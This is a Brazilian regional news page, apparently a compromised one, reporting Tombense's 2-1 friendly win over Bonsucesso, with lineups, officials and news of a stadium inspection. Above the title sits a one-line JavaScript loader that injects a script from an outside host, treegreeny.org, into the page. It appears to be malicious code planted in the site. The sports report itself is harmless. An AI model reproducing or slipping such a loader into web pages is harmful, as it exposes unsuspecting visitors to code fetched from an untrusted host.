;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Tombense vence terceiro amistoso seguido. - Portal Carangola

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Tombense vence terceiro amistoso seguido.

TOMBENSE VENCE O TERCEIRO AMISTOSO SEGUIDO E ESTÁ PRÓXIMO DE SER CONFIRMADO OFICIALMENTE COMO O MANDO DE CAMPO DO CARCARÁ EM TODAS AS PARTIDAS DO ESTADUAL, COMEÇANDO NA PARTIDA DE ESTRÉIA CONTRA O ATLÉTICO MINEIRO.

Tombense e Bonsucesso se enfrentaram nesta quinta-feira, às 17:30, no “Almeidão”. Vitória do Gavião Carcará por 2 X 1. O meia Alex marcou o primeiro gol do Carcará, aos 36 minutos, do primeiro tempo e no segundo tempo pelo Bonsucesso aos 8 minutos, Luiz Felipe empata e aos 26 minutos, um belíssimo gol do atacante Japa.

FICHA

Tombense:
Glaycon(Daniel),Chiquinho,Mailson,Carlos Alexandre(Serginho),Beto(Lazaroni),Wiliam,Marcos Galhardo(Elvinho),Juliano,Betinho(Wagner),Alex(Japa) e Tiago Azulão(Wilson). Treinador: Marcelo Cabo

Bonsucesso:
Leandro Santiago,Felipe,Luiz gustavo,Vítor Hugo,Nego,Serginho,Alex Alves,Jamil,Lídson,Jeferson,Luiz Felipe,Gustavo,Alex Carioca,Ângelo,Renan,Julinho,Felipe Walace, Josafá,Índio e Bruno Ramos. Treinador: Ricardo Barreto
Supervisor : Samuel Correia
Diretor de Futebol : Regis

Árbitro: Ronaldo Maggi; Assistentes Felipe Maggi e Victor Floriano – Trio – Faria Lemos

A equipe do Tombense segue treinando em dois períodos na cidade de Tombos e no próximo domingo, 10 horas, no ” Ameidão” , irá enfrentar a equipe Espírito Santo Sociedade Esportiva de Colatina,  da Segunda Divisão Capixaba.

O Tombense futebol Clube ( TFC) está muito próximo de ser confirmado oficialmente como o mando de campo do Carcará em todas as partidas do estadual, começando na partida de estréia contra o Atlético Mineiro.  Na tarde desta quinta-feira o TFC recebeu a vistoria dos Funcionários da Federação Mineira de Futebol.

Eles vistoriaram todas as dependências do estádio Antônio Guimarães de Almeida e confirmaram de que tudo está sendo conduzido da melhor forma fazendo uma análise positiva.

Além disto, o presidente Lane Gaviolle enviou para o presidente da Federação Mineira de Futebol(FMF), Sr. Paulo Schetino, um relatório sobre a atual condição e seus respectivos laudos do estádio Antônio Guimarães de Almeida.

Fonte: DrJulio